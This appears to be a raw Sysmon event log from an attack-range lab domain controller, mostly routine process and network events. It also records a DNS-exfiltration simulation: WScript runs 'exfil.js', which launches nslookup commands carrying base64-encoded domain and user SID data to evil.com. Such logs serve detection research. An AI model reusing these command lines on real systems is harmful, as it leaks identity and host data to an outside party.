14:16:35.586{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{00000000-0000-0000-0000-000000000000}4908<unknown process>-udpfalsefalse127.0.0.1-52808-false127.0.0.1-53domain 10341000x8000000000000000201511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.586{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E540-000000005F02}2068C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000201510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52808- 354300x8000000000000000201509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{00000000-0000-0000-0000-000000000000}4908<unknown process>-udptruefalse127.0.0.1-52808-false127.0.0.1-53domain 354300x8000000000000000201508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{00000000-0000-0000-0000-000000000000}4908<unknown process>-udpfalsefalse127.0.0.1-52807-false127.0.0.1-53domain 354300x8000000000000000201507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52807- 10341000x8000000000000000201506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.586{2E1864BB-17C3-629A-E340-000000005F02}70203976C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-E540-000000005F02}2068C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.220{00000000-0000-0000-0000-000000000000}4908<unknown process>-udptruefalse127.0.0.1-52807-false127.0.0.1-53domain 354300x8000000000000000201504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.104{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52806- 354300x8000000000000000201503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.104{00000000-0000-0000-0000-000000000000}4808<unknown process>-udptruefalse127.0.0.1-52806-false127.0.0.1-53domain 154100x8000000000000000201502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.593{2E1864BB-17C3-629A-E540-000000005F02}2068C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-E340-000000005F02}7020C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsiyhkf.tmp 2>&1 10341000x8000000000000000201501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.523{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-E440-000000005F02}8012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.523{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-E440-000000005F02}8012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.517{2E1864BB-17C3-629A-E440-000000005F02}80127520C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E340-000000005F02}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E440-000000005F02}8012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E340-000000005F02}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-17A1-629A-783D-000000005F02}55524864C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-E340-000000005F02}7020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.502{2E1864BB-17C3-629A-E340-000000005F02}7020C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsiyhkf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.486{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwtz.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-17C3-629A-E140-000000005F02}78806068C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E240-000000005F02}7328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E240-000000005F02}7328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.401{2E1864BB-17C3-629A-E040-000000005F02}66721908C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-E240-000000005F02}7328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.407{2E1864BB-17C3-629A-E240-000000005F02}7328C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-E040-000000005F02}6672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhwtz.tmp 2>&1 10341000x8000000000000000201481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.338{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-E140-000000005F02}7880C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.338{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-E140-000000005F02}7880C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.323{2E1864BB-17C3-629A-E140-000000005F02}78806068C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-E040-000000005F02}6672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.319{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-E140-000000005F02}7880C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.301{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 